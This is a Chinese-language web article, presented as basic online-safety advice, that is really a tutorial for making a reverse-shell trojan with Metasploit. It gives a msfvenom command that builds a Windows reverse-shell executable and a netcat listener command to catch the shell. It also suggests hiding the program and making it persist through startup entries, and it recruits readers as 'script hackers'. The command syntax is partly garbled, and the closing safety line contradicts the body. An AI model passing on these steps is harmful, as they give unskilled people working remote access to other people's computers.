随着网络的普及,我们的生活越来越方便,但是网络安全也成了很多人面临的一个问题。特别是那些有着商业数据的企业电脑,更要注意上网安全常识,不然病毒会对我们造成严重的威胁。 木马,诸如如此高大的黑客软件,似乎一直都是程序员和黑客专用的计算机玩具。想要制作自己的木马的普通人过去必须自己学习编程,学习各种协议编程(例如tcp)或使用他人编写的木马工具来生成它们。自从黑客H.D. Moore于2003年发布了Metasploit,计算机的安全状态已被永久更改,黑客的定义也已更改。一夜之间,任何人都可以成为黑客,每个人都可以制造自己需要的木马。当然,由Metasploit生成的Meterpreter是功能最强大的后门程序,它是结合了木马和渗透功能的后门程序,它的自定义功能也最高,但是在答案中写的时间太长了,所以我在这里教您使用Metasploit生成一个简单地反弹木马,并以此为例。 此处是Windows版本Metasploit的下载链接,这是最新版本。我更习惯将Pentestbox与Metasploit结合使用。下载地址在这里。 一、生成一个反弹回您本地IP的exe 在命令行下在本地计算机上运行ipconfig时,本地计算机的ip为192.168.1.100 在pentestbox界面下运行: msfvenom -p windows / shell_reverse_tcp LHOST = 192.168.1.100 LPORT = 443 -f exe -o d:/ 443.exe 其中,192.168.1.100是您的本地IP,端口443和443.exe可以更改为其他端口和其他名称。 二、本地nc工具监视端口443,并在执行443.exe的同时监视同一网段上的另一个虚拟机,木马上线 命令是nc -vvlp 443,与上面生成的Trojan 443.exe的端口相对应。 另一台虚拟机执行443.exe,nc界面将响应,您将获得另一台计算机的反弹外壳(请参见下图,我在我的计算机上执行了该外壳,并得到了我的Reverse shell)。 当然,此443.exe仍不称为木马,它只能被视为简单的反弹程序,但它已经具有木马的雏形。只要您可以使443.exe更加隐藏和持久地控制,例如在不被发现的情况下添加启动项,它将成为一个完整的木马。 三、其他问题 也许有些人会问,您是经过内部网络测试的木马,如果我进入公共网络,您的443.exe仍然可以使用吗?您的443.exe安全吗?您的443.exe是否支持64位计算机?我的助听器也在企业内部网中,该怎么办?这些不是问题,一切都很好。我在头条上有一篇详细的文章可以回答这些问题。地址在这里。标题为“ Hacker头条字典,在公共网络环境中使用虚拟机测试木马以及如何防御?” “。 如果您真的想从头开始制作木马,那么您应该学习编程。如果您想快速学习黑客知识并在短时间内成为脚本黑客,那么关注我的头条新闻是一个不错的选择。一旦有了一定的基础,就慢慢了解网络安全。
上面是电脑上网安全的一些基础常识,学习了安全知识,几乎可以让你免费电脑中毒的烦扰。 |
温馨提示:喜欢本站的话,请收藏一下本站!